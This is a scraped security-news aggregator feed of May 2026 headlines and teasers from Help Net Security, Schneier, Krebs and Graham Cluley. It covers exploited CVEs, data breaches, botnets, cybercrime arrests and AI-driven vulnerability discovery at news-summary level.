Google has updated Context-Aware Access (CAA) in Google Workspace to introduce a default policy assignment for SAML applications. SAML applications are third-party or internal applications that use the Security Assertion Markup Language (SAML) protocol to enable single sign-on (SSO) with Google Workspace credentials. Google says this update introduces a default assignment that serves as a universal security baseline, automatically protecting any SAML-based application that does not have a specific policy already assigned. By establishing this … More →

The post Google lets Workspace admins apply one policy across all SAML apps appeared first on Help Net Security.

7 часов назад @ helpnetsecurity.com
Cisco patches another actively exploited SD-WAN zero-day (CVE-2026-20182)
Cisco patches another actively exploited SD-WAN zero-day (CVE-2026-20182)

Cisco has patched yet another Catalyst SD-WAN Controller authentication bypass vulnerability (CVE-2026-20182) that has been exploited as a zero-day by “a highly sophisticated cyber threat actor”. About CVE-2026-20182 CVE-2026-20182 – affecting both Cisco Catalyst SD-WAN Controller (the “brain” of the Cisco Catalyst SD-WAN solution) and Cisco Catalyst SD-WAN Manager (the management plane for the entire SD-WAN fabric) – stems from a flawed peering authentication mechanism. It affects both on-prem and cloud deployments. CVE-2026-20182 was reported … More →

The post Cisco patches another actively exploited SD-WAN zero-day (CVE-2026-20182) appeared first on Help Net Security.

7 часов назад @ helpnetsecurity.com
Akamai to acquire LayerX for $205 million
Akamai to acquire LayerX for $205 million

Akamai has entered into a definitive agreement to acquire LayerX, a provider of browser-based AI usage control and secure enterprise browser (SEB) technology. LayerX’s solutions will extend Akamai’s protection into the browser, where the majority of enterprise tasks now occur and where today’s workforce engages with generative AI applications, SaaS AI solutions, and AI agents. With this acquisition, Akamai is taking a critical step in the evolution of its zero trust security portfolio and addressing … More →

The post Akamai to acquire LayerX for $205 million appeared first on Help Net Security.

9 часов назад @ helpnetsecurity.com
Thieves unlock stolen iPhones using cheap tools sold on Telegram
Thieves unlock stolen iPhones using cheap tools sold on Telegram

Helping a friend recover a stolen phone, Infoblox researchers uncovered a thriving Telegram-based underground marketplace selling unlocking tools and phishing infrastructure used to monetize stolen iPhones. Activation Lock can remotely disable a stolen iPhone and prevent normal resale, with owners also able to lock individual components. Even with those protections, more than 7.35 million iPhones are reportedly stolen each year in the United States alone. “A locked device is almost worthless on the black market, … More →

The post Thieves unlock stolen iPhones using cheap tools sold on Telegram appeared first on Help Net Security.

9 часов назад @ helpnetsecurity.com
Unpatched Microsoft Exchange Server vulnerability exploited (CVE-2026-42897)
Unpatched Microsoft Exchange Server vulnerability exploited (CVE-2026-42897)

A critical cross-site scripting (XSS) vulnerability (CVE-2026-42897) in Microsoft Exchange Server is being exploited by attackers, Microsoft warned on Thursday. A permanent fix is still in the works. In the meantime, Microsoft provided temporary mitigations. About CVE-2026-42897 CVE-2026-42897 affects on-premises versions of Microsoft Exchange Server: Subscription Edition RTM, 2019, and 2016. Exchange Online is not affected. Flagged by an anonymous researcher, the vulnerability allows an unauthorized attacker to perform spoofing over a network. “An attacker … More →

The post Unpatched Microsoft Exchange Server vulnerability exploited (CVE-2026-42897) appeared first on Help Net Security.

10 часов назад @ helpnetsecurity.com
Rocky Linux launches opt-in security repository for urgent fixes
Rocky Linux launches opt-in security repository for urgent fixes

Rocky Linux has introduced a Security Repository that allows the distribution to ship urgent security fixes ahead of upstream Enterprise Linux when public exploit code exists and upstream patches are unavailable. “The repository is disabled by default. That’s intentional. The default Rocky Linux experience stays exactly what it has always been: predictable, stable, and fully upstream-compatible. Administrators who want access to accelerated fixes can opt in when they need it,” Eric Hendricks of the Rocky … More →

The post Rocky Linux launches opt-in security repository for urgent fixes appeared first on Help Net Security.

10 часов назад @ helpnetsecurity.com
Keycard helps developers secure autonomous AI agents with scoped access
Keycard helps developers secure autonomous AI agents with scoped access

Keycard has announced Keycard for Multi-Agent Apps, extending its platform to support delegated, session-based access across systems of autonomous agents. Keycard lets developers build apps where every agent has its own identity, access is scoped to each task and every action is fully attributable across agents, users and systems. “Enterprises are rebuilding business functions around AI agents. Right now the developers building these systems have to choose: give agents broad access and they’re ungovernable or … More →

The post Keycard helps developers secure autonomous AI agents with scoped access appeared first on Help Net Security.

13 часов назад @ helpnetsecurity.com
Deepfake detection is losing ground to generative models
Deepfake detection is losing ground to generative models

Deepfake detection has been built around a single question for close to a decade. Given a video or audio clip, is it real or synthetic? Commercial detectors analyze pixels, frequencies, and biometric signals to answer that question, and the best of them post strong accuracy numbers on standard benchmarks. In deployment, performance drops sharply on content from newer generators. Researchers at the Vector Institute think this gap is structural, and closing it means rethinking what … More →

The post Deepfake detection is losing ground to generative models appeared first on Help Net Security.

15 часов назад @ helpnetsecurity.com
Zombie linkages are keeping expired domains trusted for years
Zombie linkages are keeping expired domains trusted for years

Domains expire, get transferred, and return to the market every day. The systems connected to those domains can continue trusting the original owner long after control has changed. Researchers at USC and the University of Twente examined this problem in three widely used systems: Web PKI, Maven Central, and Ethereum Name Service. They use the term “zombie linkages” to describe lingering trust records that remain active after the original domain owner no longer controls the … More →

The post Zombie linkages are keeping expired domains trusted for years appeared first on Help Net Security.

15 часов назад @ helpnetsecurity.com
The AI oversight paradox: Is the investment worth the cost of watching it?
The AI oversight paradox: Is the investment worth the cost of watching it?

Unlike in 2025, when AI adoption and testing drove business strategies, organizations in 2026 want proven ROI before committing budgets, according to a report by Globalization Partners. How global executives characterize their organization’s approach to AI adoption (Source: Globalization Partners) 62% of business leaders said they felt pressure from their organizations to use AI, while only 38% found AI tools personally beneficial. Companies also began building in-house solutions to address security and compliance requirements. “A … More →

The post The AI oversight paradox: Is the investment worth the cost of watching it? appeared first on Help Net Security.

16 часов назад @ helpnetsecurity.com
New infosec products of the week: May 15, 2026
New infosec products of the week: May 15, 2026

Here’s a look at the most interesting products from the past week Alation, Apricorn, Versa Networks, and TrustCloud. The questionnaire-based TPRM model is broken, and TrustCloud has a fix TrustCloud announced a new version of TrustLens, its third party risk management (TPRM) solution. The new TrustLens agentic AI capabilities focus on delivering four requirements every CISO wants in their TPRM program: speed, accuracy, coverage, and proactive risk mitigation. Alation AI Governance creates a system of … More →

The post New infosec products of the week: May 15, 2026 appeared first on Help Net Security.

16 часов назад @ helpnetsecurity.com
Fragnesia: New Linux kernel LPE bug was spawned by Dirty Frag patch (CVE-2026-46300)
Fragnesia: New Linux kernel LPE bug was spawned by Dirty Frag patch (CVE-2026-46300)

Researchers have found and disclosed yet another local privilege escalation (LPE) vulnerability in the Linux kernel: CVE-2026-46300, aka “Fragnesia”. The flaw is in the same class of vulnerabilities as the recently disclosed Dirty Frag bug(s). Like Dirty Frag, it affects the same Linux module (xfrm-ESP). In fact, according to Dirty Frag discoverer Hyunwoo Kim, Fragnesia was “accidentally activated” by the patch fixing one of the original Dirty Frag vulnerabilities (i.e., CVE-2026-43284). CVE-2026-46300 explained Fragnesia was … More →

The post Fragnesia: New Linux kernel LPE bug was spawned by Dirty Frag patch (CVE-2026-46300) appeared first on Help Net Security.

1 day, 6 hours назад @ helpnetsecurity.com
HYCU aiR detects insider risk and AI activity from backups
HYCU aiR detects insider risk and AI activity from backups

HYCU has announced HYCU aiR (AI Resilience), an AI-native solution that turns backup data across dozens of applications into a live and actionable intelligence for security, compliance, and IT teams. aiR lets organizations search, query, and run purpose-built agents to surface insider risk, sensitive data exposure, identity drift, and AI agent activity, using their backup data. Every backup is a timestamped record of what happened inside an organization’s applications. HYCU aiR is the first solution … More →

The post HYCU aiR detects insider risk and AI activity from backups appeared first on Help Net Security.

1 day, 6 hours назад @ helpnetsecurity.com
Cofense adds AI-powered campaign detection to stop phishing attacks
Cofense adds AI-powered campaign detection to stop phishing attacks

Cofense has announced new advancements to its Phishing Defense Platform aimed at improving detection and response to AI-powered phishing attacks. The updates include AI-driven phishing detection, enhanced triage automation, and AI-assisted training campaign creation designed to strengthen protection across the phishing lifecycle. Phishing threats are no longer one-off emails. Attackers launch coordinated, polymorphic campaigns that deliberately vary content, senders, and delivery patterns to evade both traditional and AI-only detection approaches. The Cofense platform combines AI … More →

The post Cofense adds AI-powered campaign detection to stop phishing attacks appeared first on Help Net…

1 day, 8 hours назад @ helpnetsecurity.com
Microsoft’s WinUI agent plugin trims token use by over 70% during development
Microsoft’s WinUI agent plugin trims token use by over 70% during development

Microsoft published a plugin on May 13 that lets GitHub Copilot CLI and Claude Code drive the full WinUI 3 development cycle, from project scaffolding through signed MSIX packaging. The WinUI agent plugin ships one agent, eight skills, and several supporting tools targeting the loop developers run dozens of times a day: scaffold, build, run, test, iterate. Native Windows app development with WinUI 3 pulls together several moving parts that rarely sit cleanly together for … More →

The post Microsoft’s WinUI agent plugin trims token use by over 70% during development appeared first on Help Net Security.

1 day, 10 hours назад @ helpnetsecurity.com
IT Security Guru IT Security Guru
последний пост None
SecurityTrails
последний пост None
Блоги 👨‍💻
Бизнес без опасности Бизнес без опасности
последний пост None
Жизнь 80 на 20 Жизнь 80 на 20
последний пост None
ZLONOV ZLONOV
последний пост None
Блог Артема Агеева Блог Артема Агеева
последний пост None
Киберпиздец Киберпиздец
последний пост None
Schneier on Security Schneier on Security
последний пост 9 часов назад
Bypassing On-Camera Age-Verification Checks
Bypassing On-Camera Age-Verification Checks

Some AI-based video age-verification checks can be fooled with a fake mustache.

9 часов назад @ schneier.com
Upcoming Speaking Engagements
Upcoming Speaking Engagements Upcoming Speaking Engagements

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m giving a virtual talk on “The Security of Trust in the Age of AI,” hosted by the Financial Women’s Association of New York, at 6:00 PM ET on May 21, 2026.

I’m speaking at the Potsdam Conference on National Cybersecurity at the Hasso Plattner Institut in Potsdam, Germany.

The event runs June 24–25, 2026, and my talk will be the evening of June 24.

I’m speaking at the Digital Humanism Conference in Vienna, Austria, on Tuesday, June 26, 2026.

I’m speaking at the Nuremberg Digital Festival in Nuremburg, Germany, on Wednesday, July 1, 2026.

1 day, 4 hours назад @ schneier.com
How Dangerous Is Anthropic’s Mythos AI?
How Dangerous Is Anthropic’s Mythos AI? How Dangerous Is Anthropic’s Mythos AI?

While Anthropic’s model is really good at finding software vulnerabilities, so are other models.

The UK’s AI Security Institute found that OpenAI’s GPT-5.5, already generally available, is comparable in capability.

The tax code isn’t computer code, but it’s a series of algorithms with inputs and outputs.

As goes the tax code, so goes any other complex system of rules and strategies.

We’re seeing it right now in the deluge of software vulnerabilities that these models are finding and exploiting.

1 day, 9 hours назад @ schneier.com
OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security Vulnerabilities
OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security Vulnerabilities OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security Vulnerabilities

OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security VulnerabilitiesThe UK’s AI Security Institute evaluated GPT-5.5’s ability to find security vulnerabilities, and found that it is comparable to Claude Mythos.

Note that the OpenAI model is generally available.

And here is an analysis of a smaller, cheaper model.

It requires more scaffolding from the prompter, but it is also just as good.

Posted on May 13, 2026 at 7:03 AM • 0 Comments

2 days, 9 hours назад @ schneier.com
Copy.Fail Linux Vulnerability
Copy.Fail Linux Vulnerability Copy.Fail Linux Vulnerability

TL;DRcopy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack.

Kubernetes Pod Security Standards (Restricted) and the default RuntimeDefault seccomp profile do not block the syscall used.

A custom seccomp profile is needed.

“Local privilege escalation” sounds dry, so let me unpack it.

They all share one Linux kernel with their neighbours.

3 days, 9 hours назад @ schneier.com
LLMs and Text-in-Text Steganography
LLMs and Text-in-Text Steganography LLMs and Text-in-Text Steganography

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

4 days, 9 hours назад @ schneier.com
Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia
Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia

Friday Squid Blogging: Giant Squid Live in the Waters of Western AustraliaEvidence of them has been found by analyzing DNA in the seawater.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Posted on May 8, 2026 at 5:03 PM • 2 Comments

6 days, 23 hours назад @ schneier.com
Insider Betting on Polymarket
Insider Betting on Polymarket Insider Betting on Polymarket

Insider trading is rife on Polymarket:Analysis by the Anti-Corruption Data Collective, a non-profit research and advocacy group, found that long-shot bets—­defined as wagers of $2,500 or more at odds of 35 percent or less—­on the platform had an average win rate of around 52 percent in markets on military and defense actions.

That compares with a win rate of 25 percent across all politics-focused markets and just 14 percent for all markets on the platform as a whole.

1 week назад @ schneier.com
Smart Glasses for the Authorities
Smart Glasses for the Authorities Smart Glasses for the Authorities

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

1 week, 1 day назад @ schneier.com
Rowhammer Attack Against NVIDIA Chips
Rowhammer Attack Against NVIDIA Chips Rowhammer Attack Against NVIDIA Chips

A new rowhammer attack gives complete control of NVIDIA CPUs.

On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—­and potentially much more consequential—­territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine.

For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings.

“Our work shows that Rowhammer, which is well-studied on CPUs, is a serious threat on GPUs as well,” said Andrew Kwong, co-author of one of the papers.

Unlike the previous two, the res…

1 week, 2 days назад @ schneier.com
DarkSword Malware
DarkSword Malware DarkSword Malware

DarkSword is a sophisticated piece of malware—probably government designed—that targets iOS.

Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices.

Based on toolmarks in recovered payloads, we believe the exploit chain to be called DarkSword.

These threat actors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.

The proliferation of this single exploit chain across disparate threat actors mirrors the previously discovered Coruna iOS exploit kit.

1 week, 3 days назад @ schneier.com
Hacking Polymarket
Hacking Polymarket Hacking Polymarket

Hacking PolymarketPolymarket is a platform where people can bet on real-world events, political and otherwise.

Leaving the ethical considerations of this aside (for one, it facilitates assassination), one of the issues with making this work is the verification of these real-world events.

Polymarket gamblers have threatened a journalist because his story was being used to verify an event.

And now, gamblers are taking hair dryers to weather sensors to rig weather bets.

Posted on May 4, 2026 at 5:46 AM • 0 Comments

1 week, 4 days назад @ schneier.com
A Ransomware Negotiator Was Working for a Ransomware Gang
A Ransomware Negotiator Was Working for a Ransomware Gang A Ransomware Negotiator Was Working for a Ransomware Gang

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

2 weeks назад @ schneier.com
Fast16 Malware
Fast16 Malware Fast16 Malware

Fast16 MalwareResearchers have reverse-engineered a piece of malware named Fast16.

It’s almost certainly state-sponsored, probably US in origin, and was deployed against Iran years before Stuxnet:“…the Fast16 malware was designed to carry out the most subtle form of sabotage ever seen in an in-the-wild malware tool: By automatically spreading across networks and then silently manipulating computation processes in certain software applications that perform high-precision mathematical calculations and simulate physical phenomena, Fast16 can alter the results of those programs to cause failures that range from faulty research results to catastrophic damage to real-world equipment.”Another news…

2 weeks, 1 day назад @ schneier.com
Claude Mythos Has Found 271 Zero-Days in Firefox
Claude Mythos Has Found 271 Zero-Days in Firefox Claude Mythos Has Found 271 Zero-Days in Firefox

No, it’s an extraordinary number:Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser.

We wrote previously about our collaboration with Anthropic to scan Firefox with Opus 4.6, which led to fixes for 22 security-sensitive bugs in Firefox 148.

This week’s release of Firefox 150 includes fixes for 271 vulnerabilities identified during this initial evaluation.

Our experience is a hopeful one for teams who shake off the vertigo and get to work.

Our work isn’t finished, but we’ve turned the corner and can glimpse a future much better than just keeping up.

2 weeks, 2 days назад @ schneier.com
Krebs On Security
последний пост 2 days, 22 hours назад
Patch Tuesday, May 2026 Edition
Patch Tuesday, May 2026 Edition Patch Tuesday, May 2026 Edition

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code.

May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws.

But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.

Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.

For a more granular look at the Microsoft updates released today, checkout this inventory by the SANS Internet Storm Center.

2 days, 22 hours назад @ krebsonsecurity.com
Canvas Breach Disrupts Schools & Colleges Nationwide
Canvas Breach Disrupts Schools & Colleges Nationwide Canvas Breach Disrupts Schools & Colleges Nationwide

The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.

The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform.

Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance.

Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.

Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers.

1 week назад @ krebsonsecurity.com
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs
Anti-DDoS Firm Heaped Attacks on Brazilian ISPs Anti-DDoS Firm Heaped Attacks on Brazilian ISPs

For the past several years, security experts have tracked a series of massive DDoS attacks originating from Brazil and solely targeting Brazilian ISPs.

The company originated from protecting game servers against DDoS attacks and evolved into an ISP-focused DDoS mitigation provider.

But so-called “DNS reflection” attacks rely on DNS servers that are (mis)configured to accept queries from anywhere on the Web.

“We received and notified many Tier 1 upstreams regarding very very large DDoS attacks against small ISPs,” Nascimento said.

Nascimento flatly denied being involved in DDoS attacks against Brazilian operators to generate business for his company’s services.

2 weeks, 1 day назад @ krebsonsecurity.com
‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty
‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty ‘Scattered Spider’ Member ‘Tylerb’ Pleads Guilty

A 24-year-old British national and senior member of the cybercrime group “Scattered Spider” has pleaded guilty to wire fraud conspiracy and aggravated identity theft.

FBI investigators tied Buchanan to the 2022 SMS phishing attacks after discovering the same username and email address was used to register numerous phishing domains seen in the campaign.

That same year, U.K. investigators found a device at Buchanan’s Scotland residence that included data stolen from SMS phishing victims and seed phrases from cryptocurrency theft victims.

Buchanan is the second known Scattered Spider member to plead guilty.

Two other alleged Scattered Spider members will soon be tried in the United Kingdom.

3 weeks, 3 days назад @ krebsonsecurity.com
Patch Tuesday, April 2026 Edition
Patch Tuesday, April 2026 Edition Patch Tuesday, April 2026 Edition

“This CVE can enable phishing attacks, unauthorized data manipulation, or social engineering campaigns that lead to further compromise,” Walters said.

Satnam Narang, senior staff research engineer at Tenable, said April marks the second-biggest Patch Tuesday ever for Microsoft.

Narang also said there are indications that a zero-day flaw Adobe patched in an emergency update on April 11 — CVE-2026-34621 — has seen active exploitation since at least November 2025.

Adam Barnett, lead software engineer at Rapid7, called the patch total from Microsoft today “a new record in that category” because it includes nearly 60 browser vulnerabilities.

For example, a Google Chrome update released earlier t…

1 month назад @ krebsonsecurity.com
Russia Hacked Routers to Steal Microsoft Office Tokens
Russia Hacked Routers to Steal Microsoft Office Tokens Russia Hacked Routers to Steal Microsoft Office Tokens

Hackers linked to Russia’s military intelligence units are using known flaws in older Internet routers to mass harvest authentication tokens from Microsoft Office users, security experts warned today.

The spying campaign allowed state-backed Russian hackers to quietly siphon authentication tokens from users on more than 18,000 networks without deploying any malicious software or code.

Instead, they used known vulnerabilities to modify the Domain Name System (DNS) settings of the routers to include DNS servers controlled by the hackers.

English said the routers attacked by Forest Blizzard were reconfigured to use DNS servers that pointed to a handful of virtual private servers controlled by …

1 month, 1 week назад @ krebsonsecurity.com
Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab
Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab

An elusive hacker who went by the handle “UNKN” and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face.

Shchukin’s name appeared in a Feb. 2023 filing (PDF) from the U.S. Justice Department seeking the seizure of various cryptocurrency accounts associated with proceeds from the REvil ransomware gang’s activities.

The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.

The Gandcrab team would then try to expand that access, often siphoning vast amounts of sensitive and internal documents in the process.

REvil never recovered f…

1 month, 1 week назад @ krebsonsecurity.com
‘CanisterWorm’ Springs Wiper Attack Targeting Iran
‘CanisterWorm’ Springs Wiper Attack Targeting Iran ‘CanisterWorm’ Springs Wiper Attack Targeting Iran

Experts say the wiper campaign against Iran materialized this past weekend and came from a relatively new cybercrime group known as TeamPCP.

TeamPCP then attempted to move laterally through victim networks, siphoning authentication credentials and extorting victims over Telegram.

Eriksen said it appears TeamPCP used access gained in the first attack on Aqua Security to perpetrate this weekend’s mischief.

“It’s a little all over the place, and there’s a chance this whole Iran thing is just their way of getting attention,” Eriksen said.

“While security firms appear to be doing a good job spotting this, we’re also gonna need GitHub’s security team to step up,” Cimpanu wrote.

1 month, 3 weeks назад @ krebsonsecurity.com
Feds Disrupt IoT Botnets Behind Huge DDoS Attacks
Feds Disrupt IoT Botnets Behind Huge DDoS Attacks Feds Disrupt IoT Botnets Behind Huge DDoS Attacks

The feds say the four botnets — named Aisuru, Kimwolf, JackSkid and Mossad — are responsible for a series of recent record-smashing distributed denial-of-service (DDoS) attacks capable of knocking nearly any target offline.

The government alleges the unnamed people in control of the four botnets used their crime machines to launch hundreds of thousands of DDoS attacks, often demanding extortion payments from victims.

The oldest of the botnets — Aisuru — issued more than 200,000 attacks commands, while JackSkid hurled at least 90,000 attacks.

Aisuru emerged in late 2024, and by mid-2025 it was launching record-breaking DDoS attacks as it rapidly infected new IoT devices.

That disclosure help…

1 month, 3 weeks назад @ krebsonsecurity.com
Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker
Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker

A hacktivist group with links to Iran’s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan.

Meanwhile, a voicemail message at Stryker’s main U.S. headquarters says the company is currently experiencing a building emergency.

In a lengthy statement posted to Telegram, an Iranian hacktivist group known as Handala (a.k.a.

Palo Alto says Handala surfaced in late 2023 and is assessed as one of several online personas maintained by Void Manticore, a MOIS-affiliated actor.

The security firm said Handala also has taken credit for recent attacks against fuel systems in Jordan and an Israeli energy exploratio…

2 months назад @ krebsonsecurity.com
Microsoft Patch Tuesday, March 2026 Edition
Microsoft Patch Tuesday, March 2026 Edition Microsoft Patch Tuesday, March 2026 Edition

Microsoft Corp. today pushed security updates to fix at least 77 vulnerabilities in its Windows operating systems and other software.

It would hardly be a proper Patch Tuesday without at least one critical Microsoft Office exploit, and this month doesn’t disappoint.

Ben McCarthy, lead cyber security engineer at Immersive, called attention to CVE-2026-21536, a critical remote code execution bug in a component called the Microsoft Devices Pricing Program.

Microsoft has already resolved the issue on their end, and fixing it requires no action on the part of Windows users.

For a complete breakdown of all the patches Microsoft released today, check out the SANS Internet Storm Center’s Patch Tues…

2 months назад @ krebsonsecurity.com
How AI Assistants are Moving the Security Goalposts
How AI Assistants are Moving the Security Goalposts How AI Assistants are Moving the Security Goalposts

The new hotness in AI-based assistants — OpenClaw (formerly known as ClawdBot and Moltbot) — has seen rapid adoption since its release in November 2025.

“The testimonials are remarkable,” the AI security firm Snyk observed.

WHEN AI INSTALLS AIOne of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant.

Probably the best known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents.

Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape.

2 months, 1 week назад @ krebsonsecurity.com
Who is the Kimwolf Botmaster “Dort”?
Who is the Kimwolf Botmaster “Dort”? Who is the Kimwolf Botmaster “Dort”?

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf, the world’s largest and most disruptive botnet.

Dort was an extremely active player in the Microsoft game Minecraft who gained notoriety for their “Dortware” software that helped players cheat.

Dort also used the nickname DortDev, an identity that was active in March 2022 on the chat server for the prolific cybercrime group known as LAPSUS$.

Dort peddled a service for registering temporary email addresses, as well as “Dortsolver,” code that could bypass various CAPTCHA services designed to prevent automated account abuse.

The breach tracking service Constella I…

2 months, 2 weeks назад @ krebsonsecurity.com
‘Starkiller’ Phishing Service Proxies Real Login Pages, MFA
‘Starkiller’ Phishing Service Proxies Real Login Pages, MFA ‘Starkiller’ Phishing Service Proxies Real Login Pages, MFA

Most phishing websites are little more than static copies of login pages for popular online destinations, and they are often quickly taken down by anti-abuse activists and security firms.

Enter Starkiller, a new phishing service that dynamically loads a live copy of the target login page and records everything the user types, proxying the data to the legitimate site and back to the victim.

According to an analysis of Starkiller by the security firm Abnormal AI, the service lets customers select a brand to impersonate (e.g., Apple, Facebook, Google, Microsoft et.

“Starkiller represents a significant escalation in phishing infrastructure, reflecting a broader trend toward commoditized, enterp…

2 months, 3 weeks назад @ krebsonsecurity.com
Kimwolf Botnet Swamps Anonymity Network I2P
Kimwolf Botnet Swamps Anonymity Network I2P Kimwolf Botnet Swamps Anonymity Network I2P

I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet’s control servers.

I2P is a decentralized, privacy-focused network that allows people to communicate and share information anonymously.

However, Lance James, founder of the New York City based cybersecurity consultancy Unit 221B and the original founder of I2P, told KrebsOnSecurity the entire I2P network now consists of between 15,000 and 20,000 devices on any given day.

Brundage said the Kimwolf operator(s) have been trying to build a command and control network that can’t easily be taken down by security companies and network …

3 months назад @ krebsonsecurity.com
Graham Cluley Graham Cluley
последний пост 1 day назад
Suspected Dream Market kingpin arrested after gold bars sent to his home address
Suspected Dream Market kingpin arrested after gold bars sent to his home address Suspected Dream Market kingpin arrested after gold bars sent to his home address

Prosecutors allege he is "Speedstepper" - the suspected main administrator of the notorious Dream Market dark web marketplace that operated from 2013 until its abrupt closure in 2019.

Dream Market's cryptocurrency wallets, holding millions of dollars worth in commission payments, went dormant after the site's closure.

But in November and December 2022, someone who had access to Dream Market's original private keys began to move funds around.

And, according to the indictment, those gold bars were shipped directly to Andresen's home address in Germany.

If the claims of prosecutors are true, it was a massive error by the man suspected of being the Dream Market kingpin.

1 day назад @ bitdefender.com
When ransomware gets physical: cybercriminals turn to threats of violence
When ransomware gets physical: cybercriminals turn to threats of violence When ransomware gets physical: cybercriminals turn to threats of violence

The only weapon is the hackers' threat to release stolen data, or leave your systems permanently encrypted.

Instead, they are making threats to hurt their victims.

A study last year by identity security firm Semperis found that 40% of ransomware attacks saw criminals threatening physical violence against employees who refused to pay.

Some of the most disturbing instances of cybercrime spilling out into physical violence can be found where cryptocurrency and organised crime intertwine.

With physical threats seemingly becoming more common than ever before, it's clearly important for defenders to learn some lessons.

1 day, 11 hours назад @ bitdefender.com
Smashing Security podcast #467: How ShinyHunters hacked the world’s biggest universities
Smashing Security podcast #467: How ShinyHunters hacked the world’s biggest universities Smashing Security podcast #467: How ShinyHunters hacked the world’s biggest universities

I don't know.

Yeah, that's it, that's it.

Now, one of those in your— I was about to say Filofax, but I don't think those are a thing anymore.

But you know, yeah, as you point out, a large part of this is through the same ecosystem.

He is professor of letters at a— I don't know which letters, I imagine all of them— at a university in Besançon.

1 day, 21 hours назад @ grahamcluley.com
One in eight UK workers has sold their company passwords, and bosses think it’s fine
One in eight UK workers has sold their company passwords, and bosses think it’s fine

One in eight UK workers admits to selling their company login credentials - or knowing someone who has - in the past 12 months. The really alarming bit? Their bosses are even more relaxed about it. Read more in my article on the Fortra blog.

1 week назад @ fortra.com
Inside Department 4: Russia’s secret school for hackers
Inside Department 4: Russia’s secret school for hackers Inside Department 4: Russia’s secret school for hackers

Russia's military intelligence service, the GRU, directly controls who gets into Department 4, according to the leak.

It is GRU that is overseeing exams, and signing-off on graduates' postings, with some promising students scouted as early as secondary school.

Upon his graduation, he is said to have been assigned to the Fancy Bear hacking group, which was linked by the US Department of Justice over the high profile hack of the Democratic National Committee.

He has, it seems, gone from running the Fancy Bear hacking group to helping train its replacements.

What the report does is act as a useful reminder that the threat posed by groups like Fancy Bear and Sandworm is serious and organised.

1 week назад @ bitdefender.com
Sri Lanka makes 37 arrests as it raids another scam centre
Sri Lanka makes 37 arrests as it raids another scam centre Sri Lanka makes 37 arrests as it raids another scam centre

Sri Lankan police have arrested 37 people suspected of running a scam centre in a suburb of the capital city Colombo.

Prior to that, in March, immigration officers arrested 135 Chinese men and women in connection with another scam centre.

So the obvious question to ask is: what are these alleged scam centres suspected of being doing?

Sri Lanka has recently boosted its appeal to foreign tourists by relaxing visa requirements, and has been "rewarded" by more scam centers popping up in its cities residential suburbs.

You don't have to live anywhere near a scam compound for any of this to land in your life.

1 week назад @ bitdefender.com
Smashing Security podcast #466: Meta sees everything, Copy Fail, and a deepfake gets hired
Smashing Security podcast #466: Meta sees everything, Copy Fail, and a deepfake gets hired Smashing Security podcast #466: Meta sees everything, Copy Fail, and a deepfake gets hired

